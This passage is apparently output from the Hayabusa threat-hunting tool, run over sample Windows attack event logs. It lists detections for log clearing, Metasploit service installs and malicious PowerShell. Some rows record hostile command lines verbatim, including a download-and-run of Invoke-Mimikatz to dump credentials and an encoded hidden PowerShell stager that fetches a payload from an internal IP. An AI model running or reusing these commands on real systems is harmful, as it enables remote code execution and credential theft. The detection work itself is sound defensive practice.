IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 
WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 
+2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 
0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,,New Service 
Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 
+09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 
